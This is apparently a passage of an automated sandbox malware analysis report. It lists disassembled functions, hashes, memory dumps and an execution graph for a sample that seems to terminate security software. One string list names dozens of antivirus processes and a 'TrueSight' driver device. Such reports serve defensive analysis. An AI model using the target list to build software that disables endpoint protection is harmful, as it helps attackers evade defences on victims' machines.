                                                      • Instruction Fuzzy Hash: 0F31D1B5614F4881EB42CB57F8803D463A6B79CBD4F984516EB0E8B372EF3AC4958304
                                                      Function 0000000140004400 Relevance: 6.1, APIs: 4, Instructions: 69COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.2354988888.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                      • Associated: 00000007.00000002.2354970755.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000007.00000002.2355010332.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000007.00000002.2355026686.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000007.00000002.2355042778.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_140000000_5oqa98.jbxd
                                                      Similarity
                                                      • API ID: CriticalEventSection$EnterLeaveReset
                                                      • String ID:
                                                      • API String ID: 3553466030-0
                                                      • Opcode ID: 6e550663b123c7b4300ff756dd79b72a11867f34fdb7ecd18ec55ee4b4ab60ba
                                                      • Instruction ID: 80aeca48758360c6ba791d23c15ba34d7cc547f8c7a26c6fbcbbb07f4ec0a80e
                                                      • Opcode Fuzzy Hash: 6e550663b123c7b4300ff756dd79b72a11867f34fdb7ecd18ec55ee4b4ab60ba
                                                      • Instruction Fuzzy Hash: 6F3127B2220A8483D761DF27F48439AB3A0F798BD4F000116EB8A47BB5DF39E491C344
                                                      Function 00007FF8FF5D2218 Relevance: 6.0, APIs: 4, Instructions: 39timethreadCOMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.2355082229.00007FF8FF5D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8FF5D0000, based on PE: true
                                                      • Associated: 00000007.00000002.2355062025.00007FF8FF5D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000007.00000002.2355107387.00007FF8FF5E2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000007.00000002.2355125582.00007FF8FF5ED000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000007.00000002.2355145279.00007FF8FF5EF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_7ff8ff5d0000_5oqa98.jbxd
                                                      Similarity
                                                      • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                      • String ID:
                                                      • API String ID: 2933794660-0
                                                      • Opcode ID: 540efdc4acb7237d38814a0210c5b4881e051432956c40de0382b68ade111df8
                                                      • Instruction ID: a042b3e456ddfda8297d21961ad4b93d947f4da912abe79d03f042b509ec0f0d
                                                      • Opcode Fuzzy Hash: 540efdc4acb7237d38814a0210c5b4881e051432956c40de0382b68ade111df8
                                                      • Instruction Fuzzy Hash: 8A110A26B14B058AEB00CF60EC562A837A4F769798F440E31DA7D477E8EF78D1558740
                                                      Function 0000000140013670 Relevance: 6.0, APIs: 4, Instructions: 33COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.2354988888.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                      • Associated: 00000007.00000002.2354970755.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000007.00000002.2355010332.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000007.00000002.2355026686.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000007.00000002.2355042778.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_140000000_5oqa98.jbxd
                                                      Similarity
                                                      • API ID: CreateEvent$CriticalInitializeSection
                                                      • String ID:
                                                      • API String ID: 926662266-0
                                                      • Opcode ID: 6e7557a2c0ebfea515044b23bc829654ad5a6134d5329468471647cedafa6715
                                                      • Instruction ID: 312f8d8d13b8a868d26f937b45fb8075aed367f1a83d8c92d196673213f535ba
                                                      • Opcode Fuzzy Hash: 6e7557a2c0ebfea515044b23bc829654ad5a6134d5329468471647cedafa6715
                                                      • Instruction Fuzzy Hash: 8F015A31610F0582E726DFA2B855BCA37E2F75D385F854529FA4A8B630EF3A8145C700
                                                      Function 00007FF8FF5D5C00 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 163COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.2355082229.00007FF8FF5D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8FF5D0000, based on PE: true
                                                      • Associated: 00000007.00000002.2355062025.00007FF8FF5D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000007.00000002.2355107387.00007FF8FF5E2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000007.00000002.2355125582.00007FF8FF5ED000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000007.00000002.2355145279.00007FF8FF5EF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_7ff8ff5d0000_5oqa98.jbxd
                                                      Similarity
                                                      • API ID: __except_validate_context_record
                                                      • String ID: csm$csm
                                                      • API String ID: 1467352782-3733052814
                                                      • Opcode ID: 7b854735182fbbf9032f6bb379489979c6e7540e10eb2e5c3fda445f13d9ec39
                                                      • Instruction ID: 57d9daa4bd9cd655dd03c069fc7147f31b58ef6cc4691fed317d46817ffb81e1
                                                      • Opcode Fuzzy Hash: 7b854735182fbbf9032f6bb379489979c6e7540e10eb2e5c3fda445f13d9ec39
                                                      • Instruction Fuzzy Hash: 0271AF3290E6818FDB609B25994077D7BA0EB28FC9F048235DEBC47AD9CB2CD551C741
                                                      Function 00007FF8FF5D6298 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 120COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.2355082229.00007FF8FF5D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8FF5D0000, based on PE: true
                                                      • Associated: 00000007.00000002.2355062025.00007FF8FF5D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000007.00000002.2355107387.00007FF8FF5E2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000007.00000002.2355125582.00007FF8FF5ED000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000007.00000002.2355145279.00007FF8FF5EF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_7ff8ff5d0000_5oqa98.jbxd
                                                      Similarity
                                                      • API ID: CreateFrameInfo__except_validate_context_record
                                                      • String ID: csm
                                                      • API String ID: 2558813199-1018135373
                                                      • Opcode ID: fdc43af78747129a673bd1320e44d2e2152711131f73500a528a0e9cffec3944
                                                      • Instruction ID: dba4bd1eee6ccd1245f2625eba6fd153ea7f4eef6fe8aad55eeb10d51de7f55f
                                                      • Opcode Fuzzy Hash: fdc43af78747129a673bd1320e44d2e2152711131f73500a528a0e9cffec3944
                                                      • Instruction Fuzzy Hash: D5514F3661EB419BD720AF15E84026DB7A4FB99BD0F100239EBAD17B95CF38E461CB01
                                                      Function 00007FF8FF5DEA8C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100fileCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.2355082229.00007FF8FF5D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8FF5D0000, based on PE: true
                                                      • Associated: 00000007.00000002.2355062025.00007FF8FF5D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000007.00000002.2355107387.00007FF8FF5E2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000007.00000002.2355125582.00007FF8FF5ED000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000007.00000002.2355145279.00007FF8FF5EF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_7ff8ff5d0000_5oqa98.jbxd
                                                      Similarity
                                                      • API ID: ErrorFileLastWrite
                                                      • String ID: U
                                                      • API String ID: 442123175-4171548499
                                                      • Opcode ID: 1bda24f103a1684070c02434e8f6c76fd55582b454c16690d6623519bbb42c9a
                                                      • Instruction ID: 83d81b29b2abbcc2e6c6be71828f22d0ba1287447fde186218da84b6dbf09546
                                                      • Opcode Fuzzy Hash: 1bda24f103a1684070c02434e8f6c76fd55582b454c16690d6623519bbb42c9a
                                                      • Instruction Fuzzy Hash: 4B41C522A1E65186EB208F65E8453A96761F7987C4F404131DA5E87795DF3CE441CB40
                                                      Function 0000000140012523 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 69COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.2354988888.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                      • Associated: 00000007.00000002.2354970755.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000007.00000002.2355010332.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000007.00000002.2355026686.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000007.00000002.2355042778.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_140000000_5oqa98.jbxd
                                                      Similarity
                                                      • API ID: ExceptionRaise
                                                      • String ID: csm
                                                      • API String ID: 3997070919-1018135373
                                                      • Opcode ID: dba88b77ed38871436108f768fa7b3f2c7bfcf036fc2a4a051b753ac1ce5513b
                                                      • Instruction ID: 49e9958dea4625aba6399e71a496f31833793ec74c7c4936f150dd50c3eb5df3
                                                      • Opcode Fuzzy Hash: dba88b77ed38871436108f768fa7b3f2c7bfcf036fc2a4a051b753ac1ce5513b
                                                      • Instruction Fuzzy Hash: 1D315036204A8082D771CF16E09079EB365F78C7E4F544111EF9A077B5DB3AD892CB41
                                                      Function 00007FF8FF5E0910 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 64COMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 00007FF8FF5D3A38: __except_validate_context_record.LIBVCRUNTIME ref: 00007FF8FF5D3A63
                                                      • __GSHandlerCheckCommon.LIBCMT ref: 00007FF8FF5E0993
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.2355082229.00007FF8FF5D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8FF5D0000, based on PE: true
                                                      • Associated: 00000007.00000002.2355062025.00007FF8FF5D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000007.00000002.2355107387.00007FF8FF5E2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000007.00000002.2355125582.00007FF8FF5ED000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000007.00000002.2355145279.00007FF8FF5EF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_7ff8ff5d0000_5oqa98.jbxd
                                                      Similarity
                                                      • API ID: CheckCommonHandler__except_validate_context_record
                                                      • String ID: csm$f
                                                      • API String ID: 1543384424-629598281
                                                      • Opcode ID: df4735a4e908aa111fba586a5857847e844898d503be1ccfbed92f1abe6d2401
                                                      • Instruction ID: 2d3cf11547db211a2c02104edaa08bd2c933143203a896691b1518c0b1ff0ef7
                                                      • Opcode Fuzzy Hash: df4735a4e908aa111fba586a5857847e844898d503be1ccfbed92f1abe6d2401
                                                      • Instruction Fuzzy Hash: D1110632A187818AE710AF52E84116DA764EB59FC4F188135EFA80BB86CE38D851CB00
                                                      Function 0000000140003620 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 45timeCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.2354988888.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                      • Associated: 00000007.00000002.2354970755.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000007.00000002.2355010332.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000007.00000002.2355026686.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000007.00000002.2355042778.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_140000000_5oqa98.jbxd
                                                      Similarity
                                                      • API ID: TimerWaitable
                                                      • String ID: amps_Set: pHandle=%p, propId=%d, val=%p, vSize=%d
                                                      • API String ID: 1823812067-484248852
                                                      • Opcode ID: 590ed17bb6164494f623543e183e49ebce91c212c09f63c64337d20ba62503d7
                                                      • Instruction ID: 814455377fd743a09d1ce94c7697c2570c7384a68551c8a3e3690f56dccab0e4
                                                      • Opcode Fuzzy Hash: 590ed17bb6164494f623543e183e49ebce91c212c09f63c64337d20ba62503d7
                                                      • Instruction Fuzzy Hash: 25114975608B4082EB21CF16B84079AB7A4F79DBD4F544225FF8847B79DB39C5508B40
                                                      Function 00007FF8FF5D3990 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      • RtlPcToFileHeader.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF8FF5D112F), ref: 00007FF8FF5D39E0
                                                      • RaiseException.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF8FF5D112F), ref: 00007FF8FF5D3A21
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.2355082229.00007FF8FF5D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8FF5D0000, based on PE: true
                                                      • Associated: 00000007.00000002.2355062025.00007FF8FF5D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000007.00000002.2355107387.00007FF8FF5E2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000007.00000002.2355125582.00007FF8FF5ED000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000007.00000002.2355145279.00007FF8FF5EF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_7ff8ff5d0000_5oqa98.jbxd
                                                      Similarity
                                                      • API ID: ExceptionFileHeaderRaise
                                                      • String ID: csm
                                                      • API String ID: 2573137834-1018135373
                                                      • Opcode ID: 886c576564c2cc2de453fb1cc39b3a925429a78efbd1798258f32c7f13ed655c
                                                      • Instruction ID: f3ea602b64d858c408b30e1d39a607e0b7c0ed017a7bdfd6211192f1feb99256
                                                      • Opcode Fuzzy Hash: 886c576564c2cc2de453fb1cc39b3a925429a78efbd1798258f32c7f13ed655c
                                                      • Instruction Fuzzy Hash: F2115E32A09B4182EB608F15E800269B7E5FB9CB88F584330DEAD07798DF3CD552CB00
                                                      Function 00000001400036E0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 39timeCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.2354988888.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                      • Associated: 00000007.00000002.2354970755.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000007.00000002.2355010332.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000007.00000002.2355026686.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000007.00000002.2355042778.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_140000000_5oqa98.jbxd
                                                      Similarity
                                                      • API ID: TimerWaitable
                                                      • String ID: amps_Get: pHandle=%p, propId=%d, val=%p, vSize=%d
                                                      • API String ID: 1823812067-3336177065
                                                      • Opcode ID: ec5ea581405e177efc46dfcfb63def396c6c184119c2e2df6ecfca0784b7c7fe
                                                      • Instruction ID: 709d983207ec740d9f2c7308925ee729c80a4ac6442fb255827ec98b57545574
                                                      • Opcode Fuzzy Hash: ec5ea581405e177efc46dfcfb63def396c6c184119c2e2df6ecfca0784b7c7fe
                                                      • Instruction Fuzzy Hash: 731170B2614B8082D711CF16F480B9AB7A4F38CBE4F444216BF9C47B68CF78C5508B40
                                                      Function 00000001400137D0 Relevance: 5.0, APIs: 4, Instructions: 27memoryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.2354988888.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                      • Associated: 00000007.00000002.2354970755.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000007.00000002.2355010332.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000007.00000002.2355026686.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000007.00000002.2355042778.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_140000000_5oqa98.jbxd
                                                      Similarity
                                                      • API ID: Heap$FreeProcess
                                                      • String ID:
                                                      • API String ID: 3859560861-0
                                                      • Opcode ID: 57607852ce15da45032583eecf595b266eb818b51a75700467a9fc2c410260bf
                                                      • Instruction ID: 86a4b35954e85bb75ec39e114bccfc50e282ec3ca0152174d73c8df7cd9b4be4
                                                      • Opcode Fuzzy Hash: 57607852ce15da45032583eecf595b266eb818b51a75700467a9fc2c410260bf
                                                      • Instruction Fuzzy Hash: ADF07FB4615B4481FB078FA7B84479422E5EB4DBC0F481028AB494B3B0DF7A80998710

                                                      Execution Graph

                                                      Execution Coverage:6%
                                                      Dynamic/Decrypted Code Coverage:100%
                                                      Signature Coverage:4%
                                                      Total number of Nodes:124
                                                      Total number of Limit Nodes:2
                                                      execution_graph 6927 628100 6928 6283f5 6927->6928 6938 6291b5 6928->6938 6932 628561 6933 628751 6932->6933 6935 628555 6932->6935 6936 628589 6932->6936 6934 628762 SleepEx 6933->6934 6934->6935 6936->6935 6946 62d535 6936->6946 6969 628ab5 6938->6969 6940 62926d GetFileAttributesA 6941 628551 6940->6941 6941->6935 6942 6292a5 6941->6942 6943 629317 6942->6943 6944 62937f SleepEx 6943->6944 6945 6293a0 6944->6945 6945->6932 6947 62d542 6946->6947 6948 62dd74 6947->6948 6949 62d575 6947->6949 6968 62dae1 6948->6968 6971 62aef5 6948->6971 6976 62ce55 6949->6976 6952 62d582 6980 62ba35 6952->6980 6954 62d72f 6957 62ba35 2 API calls 6954->6957 6955 62dd8f 6956 62ba35 2 API calls 6955->6956 6958 62dfbb 6956->6958 6959 62d841 6957->6959 6960 62ba35 2 API calls 6958->6960 6961 62ba35 2 API calls 6959->6961 6962 62e0cd 6960->6962 6964 62d925 6961->6964 6963 62ba35 2 API calls 6962->6963 6966 62e1b1 6963->6966 6965 62ba35 2 API calls 6964->6965 6965->6968 6967 62ba35 2 API calls 6966->6967 6967->6968 6968->6935 6970 628adf 6969->6970 6970->6940 6972 62af06 6971->6972 6973 62afca CreateDirectoryA 6972->6973 6985 62e7e5 6973->6985 6975 62afe4 6975->6955 6977 62ce66 6976->6977 6978 62e7e5 2 API calls 6977->6978 6979 62d005 6978->6979 6979->6952 6981 62bb36 6980->6981 6982 62bb65 CreateFileA 6981->6982 6983 62bba7 WriteFile 6982->6983 6984 62bbd7 6982->6984 6983->6984 6984->6954 6986 62e8a0 6985->6986 6987 62e913 GetFileAttributesA 6986->6987 6988 62e933 6987->6988 6989 62e92f 6987->6989 6988->6989 6990 62e942 SetFileAttributesA 6988->6990 6989->6975 6990->6989 6991 28f18a0 6993 28f1c67 6991->6993 6992 28f1eba 6993->6992 6995 28f34d0 TerminateProcess 6993->6995 6996 28f3ca0 TerminateProcess 6993->6996 6997 28f9f2c 6993->6997 6995->6993 6996->6993 6998 28f9f66 6997->6998 7001 28f9f39 memcpy_s 6997->7001 6999 28f9f89 memcpy_s 6998->6999 7000 28f9fa5 6998->7000 7006 28fb388 _invalid_parameter_noinfo TerminateProcess 6999->7006 7011 28f7cf0 7000->7011 7005 28f9ef0 7001->7005 7008 28fb388 7001->7008 7005->6993 7007 28f9f99 7006->7007 7007->6993 7019 28fb220 7008->7019 7010 28f9f4e 7010->6993 7012 28f7d0f 7011->7012 7013 28f7d14 7011->7013 7012->7007 7013->7012 7034 28fb994 7013->7034 7015 28f7d2f 7042 28fbcf4 7015->7042 7020 28fb24b 7019->7020 7023 28fb2bc 7020->7023 7022 28fb272 _invalid_parameter_noinfo 7022->7010 7025 28fb2e6 _invalid_parameter_noinfo 7023->7025 7024 28fb2f7 7024->7022 7025->7024 7030 28fb3a8 7025->7030 7027 28fb387 7028 28fb220 _invalid_parameter_noinfo TerminateProcess 7027->7028 7029 28fb3a1 7028->7029 7029->7022 7031 28fb3b6 7030->7031 7032 28fb301 _invalid_parameter_noinfo 7031->7032 7033 28fb3db TerminateProcess 7031->7033 7032->7027 7037 28fb9a8 memcpy_s 7034->7037 7035 28fba4e 7035->7015 7037->7035 7050 28faee0 7037->7050 7038 28faee0 TerminateProcess 7039 28fbb09 7038->7039 7040 28fba8c memcpy_s 7040->7015 7041 28fba66 memcpy_s 7041->7038 7041->7040 7043 28f7d52 7042->7043 7044 28fbd09 7042->7044 7046 28fbd60 7043->7046 7044->7043 7066 2900550 7044->7066 7047 28fbd75 7046->7047 7049 28fbd88 7046->7049 7047->7049 7072 28ff2ac 7047->7072 7049->7012 7051 28faee9 7050->7051 7053 28faef8 7051->7053 7054 28ffb6c 7051->7054 7053->7041 7056 28ffb9c memcpy_s 7054->7056 7058 28ffbc3 memcpy_s 7054->7058 7055 28ffc00 7055->7053 7056->7055 7057 28ffc45 memcpy_s 7056->7057 7056->7058 7060 28fb388 _invalid_parameter_noinfo TerminateProcess 7057->7060 7059 28ffdcc memcpy_s 7058->7059 7061 28fb994 TerminateProcess 7058->7061 7064 28ffcff memcpy_s 7058->7064 7059->7053 7060->7055 7062 28ffcef 7061->7062 7063 28fb994 TerminateProcess 7062->7063 7063->7064 7065 28fb994 TerminateProcess 7064->7065 7065->7064 7067 28fb994 TerminateProcess 7066->7067 7069 290055f memcpy_s 7067->7069 7068 29005aa 7068->7043 7069->7068 7070 28faee0 TerminateProcess 7069->7070 7071 29005bd 7070->7071 7073 28fb994 TerminateProcess 7072->7073 7074 28ff2b5 7073->7074

                                                      Executed Functions

                                                      Function 028F18A0 Relevance: 96.6, Strings: 77, Instructions: 306COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.2573641714.00000000028F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028F0000, based on PE: true
                                                      • Associated: 00000008.00000002.2573620459.00000000028F0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000008.00000002.2573672568.0000000002908000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000008.00000002.2573691251.0000000002914000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000008.00000002.2573709719.0000000002916000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000008.00000002.2573726264.0000000002918000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000008.00000002.2573753992.000000000294C000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000008.00000002.2573778595.0000000002952000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000008.00000002.2574011960.0000000002B45000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_28f0000_5oqa98.jbxd
                                                      Similarity
                                                      • API ID: _invalid_parameter_noinfo
                                                      • String ID: 360Safe.exe$360sd.exe$360tray.exe$AYAgent.aye$BLuPro.exe$BaiduSd.exe$Bka.exe$BkavService.exe$BkavSystemServer.exe$BkavSystemService.exe$BkavSystemService64.exe$BkavUtil.exe$BluProService.exe$C:\Windows\System32\drivers\189atohci.sys$D"$D"$HipsDaemon.exe$HipsMain.exe$HipsTray.exe$K7TSecurity.exe$KSafeTray.exe$KvMonXP.exe$LAVService.exe$LISFService.exe$LenovoPcManagerService.exe$LenovoTray.exe$LnvSvcFdn.exe$MsMpEng.exe$NisSrv.exe$PSafeSysTray.exe$PopWndLog.exe$PromoUtil.exe$QHActiveDefense.exe$QHSafeMain.exe$QHSafeScanner.exe$QHSafeTray.exe$QHWatchdog.exe$QMDL.exe$QMPersonalCenter.exe$QQPCMgrUpdate.exe$QQPCPatch.exe$QQPCRTP.exe$QQPCRealTimeSpeedup.exe$QQPCTray.exe$QQRepair.exe$QUHLPSVC.EXE$RavMonD.exe$SecurityHealthSystray.exe$TMBMSRV.exe$UnThreat.exe$V3Svc.exe$ZhuDongFangYu.exe$\\.\TrueSight$ad-watch.exe$ashDisp.exe$avcenter.exe$avgwdsvc.exe$avp.exe$avpui.exe$baiduSafeTray.exe$cefutil.exe$knsdtray.exe$kscan.exe$ksetupwiz.exe$kwsprotect64.exe$kxemain.exe$kxescore.exe$kxetray.exe$mpcopyaccelerator.exe$mssecess.exe$remupd.exe$rtvscan.exe$vsserv.exe$wsctrl.exe$wsctrl10.exe$wsctrl11.exe$wsctrlsvc.exe
                                                      • API String ID: 3215553584-2746239348
                                                      • Opcode ID: 04a099e1945153ba78488db7a66343e57d8327102518b5817018baafa47bfd57
                                                      • Instruction ID: aa03e8dd650741aca39f007f45dcb05bb3566ee67abaabaf98eaf234ffcec9af
                                                      • Opcode Fuzzy Hash: 04a099e1945153ba78488db7a66343e57d8327102518b5817018baafa47bfd57
                                                      • Instruction Fuzzy Hash: A802BC36205F81D9EB61DF21E8943DA33A9F748358F500226DE9D57B68EF39C2A9C740
                                                      Function 028F3CA0 Relevance: 4.3, Strings: 3, Instructions: 531COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 126 28f3ca0-28f3cde call 2906790 call 28f3be0 131 28f3ce4-28f3d1e call 2906a70 call 28f3590 126->131 132 28f45e1 126->132 140 28f3d21-28f3d28 131->140 134 28f45e3-28f4609 call 28f4620 132->134 140->140 141 28f3d2a-28f3d5b call 2906a70 call 28f3590 140->141 146 28f3d62-28f3d69 141->146 146->146 147 28f3d6b-28f3dd4 call 2906a70 call 28f3590 call 29e2e65 146->147 154 28f3dda-28f3e05 call 2906a70 call 28f3740 147->154 155 28f3f20-28f3f25 147->155 154->155 160 28f3e0b-28f3e76 call 2906e30 call 2906a70 * 2 154->160 155->134 167 28f3e78-28f3e7e 160->167 168 28f3e80-28f3e9f 160->168 169 28f3ea1-28f3ea8 167->169 168->169 170 28f3efe-28f3f11 call 28f3a20 168->170 172 28f3eaa-28f3eb4 169->172 173 28f3eb6-28f3ecd 169->173 176 28f3f2a-28f3f31 170->176 177 28f3f13-28f3f1b call 2a0bd67 170->177 175 28f3ed3-28f3ed5 172->175 173->175 175->170 178 28f3ed7-28f3ede 175->178 176->177 180 28f3f33-28f3f3a 176->180 177->155 181 28f3eec-28f3ef7 178->181 182 28f3ee0-28f3eea 178->182 180->177 183 28f3f3c-28f3fa6 call 2906a70 * 2 180->183 181->170 182->170 188 28f3fa8-28f3fae 183->188 189 28f3fb0-28f3fdc 183->189 190 28f3fde-28f3fe5 188->190 189->190 191 28f400f-28f4019 189->191 194 28f3fe7-28f3ff1 190->194 195 28f3ff3-28f4009 190->195 192 28f401f-28f4026 191->192 193 28f4483-28f4496 call 28f3a20 191->193 197 28f4028-28f4032 192->197 198 28f4034-28f404b 192->198 193->177 201 28f449c-28f44a3 193->201 194->191 195->191 200 28f4051-28f4053 197->200 198->200 200->193 202 28f4059-28f4060 200->202 201->177 203 28f44a9-28f44b0 201->203 204 28f406e-28f4084 202->204 205 28f4062-28f406c 202->205 203->177 206 28f44b6-28f4517 call 2906a70 * 2 203->206 207 28f408a-28f408c 204->207 205->207 221 28f4519-28f451f 206->221 222 28f4521-28f454c 206->222 207->193 209 28f4092-28f4098 207->209 211 28f409a-28f40a4 209->211 212 28f40a6-28f40d5 call 2906e30 209->212 214 28f40db-28f40dd 211->214 212->214 214->193 216 28f40e3-28f40ea 214->216 219 28f40ec-28f40f6 216->219 220 28f40f8-28f410f 216->220 223 28f4115-28f4117 219->223 220->223 224 28f454e-28f4555 221->224 222->224 225 28f45a6-28f45b9 call 28f3a20 222->225 223->193 226 28f411d-28f4124 223->226 228 28f4557-28f4561 224->228 229 28f4563-28f457a 224->229 225->177 236 